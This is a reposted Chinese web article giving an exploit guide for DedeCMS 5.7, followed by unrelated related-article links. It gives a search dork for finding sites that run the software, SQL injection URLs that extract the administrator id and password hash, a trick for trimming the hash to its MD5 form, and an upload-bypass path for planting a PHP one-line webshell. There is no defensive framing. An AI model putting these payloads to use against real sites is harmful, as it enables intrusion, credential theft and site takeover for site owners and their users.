dedecms5.7最新注入和上传漏洞

漏洞描述度搜索关键字Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问/data/admin/ver.txt页面获取系统最后升级时间,然后访问/member/ajax_membergroup.php?action=postmembergroup=1页面, 然后访问/

漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select userid from `%23@__admin` where 1 or id=@`’` 查看管理员id

/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23@__admin` where 1 or id=@`’` 查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

只要登陆会员中心,然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至253000106@qq.com举报,一经查实,本站将立刻删除。

发布者:PHP中文网,转转请注明出处:https://www.chuangxiangniao.com/p/1673312.html

(0)
上一篇 2025年2月19日 09:17:18
下一篇 2025年2月19日 09:17:34

AD推荐 黄金广告位招租... 更多推荐

相关推荐

  • 中润资源重组最新,中润资源重组2019

    6月24日晚间,中润资源(000506)就近两年的重组事项回复深交所问询函,包括2017年拟置出子公司山东中润集团淄博置业有限公司(下称“淄博置业”)60%股权的最近进展,以及2018年收购黄金产销公司的具体方案,股票将于6月25日开市起复…

    用户投稿 2025年5月19日
    1700
  • 最新的黄金价格,2022年黄金价格会掉吗

    黄金最新金价,2022年09月01日,老庙黄金、老凤祥、周六福珠宝、周大福、周生生、亚一金店、六福珠宝、菜百首饰、金至尊等国内各大金店品牌黄金、铂金最新金价表 黄金纯金首饰质地较软,牙咬有印,容易弯折,色泽金黄、纯正、柔和,手感沉重,有沉甸…

    用户投稿 2025年5月18日
    1600
  • 最新黄金价格,2021到2022年黄金价格预测

    黄金最新金价,2022年09月09日,老庙黄金、老凤祥、周六福珠宝、周大福、周生生、亚一金店、六福珠宝、菜百首饰、金至尊等国内各大金店品牌黄金、铂金最新金价表 黄金纯金首饰质地较软,牙咬有印,容易弯折,色泽金黄、纯正、柔和,手感沉重,有沉甸…

    用户投稿 2025年5月17日
    1800
  • spring注入的三种方式是什么

    spring注入的三种方式是:1、构造器注入;2、setter注入;3、接口注入。构造器注入依赖于构造方法的实现,setter注入是通过setter方法注入。 spring的依赖注入分为三种方式,如下: 1、构造器注入 2、setter注入…

    2025年5月3日
    000
  • html里怎样实现异步上传文件

    这次给大家带来html里怎样实现异步上传文件,html里实现异步上传文件的注意事项有哪些,下面就是实战案例,一起来看一下。 代码如下: 登录后复制 这是html中最常见最简单的表单提交方式,但是这种方式必须会切换页面,也许有些时候我们希望可…

    编程技术 2025年4月4日
    200
  • Laravel开发注意事项:避免常见的代码漏洞

    Laravel是一个广受欢迎的PHP开发框架,它的便捷性和安全性使得许多开发者选择使用它来构建应用程序。然而,即使使用了这样一个安全的框架,开发者也需要注意避免常见的代码漏洞。本文将介绍一些Laravel开发注意事项,帮助开发者在构建应用程…

    2025年4月2日
    100
  • 如何使用vscode将项目上传到github

    1、创建本地仓库 这时可以发现文件夹里面多了个.git文件夹,它是Git用来跟踪和管理版本库的。如果你看不到,是因为它默认是隐藏文件,那你就需要设置一下让隐藏文件可见。 2、把项目提交到本地仓库 3、与github的远程仓库建立联系 git…

    2025年4月2日
    200
  • vscode怎样将项目上传到github

    1、在github上新建一个项目仓库(新建完后有一个地址,这个非常重要,下文简称地址) 2、在桌面新建一个文件夹,例如: 3、在vs code 打开这个文件夹,输入git clone 地址,获取你在GitHub的项目 4、获取项目后,桌面文…

    2025年4月2日 编程技术
    200
  • Photoshop设计制作出逼真质感的白金项链黄绿色心形吊坠

    在ps中,样式的应用相当广泛,制作各式各样的项链就是其中应用之一,通过photoshop cs3自身提供的样式其实可以非常轻松的制作出各种特殊效果,本ps教程实例“ps教程入门-白金项链吊坠”就以白金项链吊坠的绘制来进行讲解。   phot…

    2025年4月1日 编程技术
    100
  • photoshop性能的关键参数:高速缓存级别

    以 photoshop cs3 为例,将高速缓存级别调为 1 (关闭高速缓存级别),与将级别调为 8 ( 最大值 ) ,测试发现,真有天壤之别。打开同样一个 ( 例如 5m 大小 ) 的文件,你将发现,关闭高速缓存级别之后,文件打开速度奇快…

    编程技术 2025年4月1日
    100

发表回复

登录后才能评论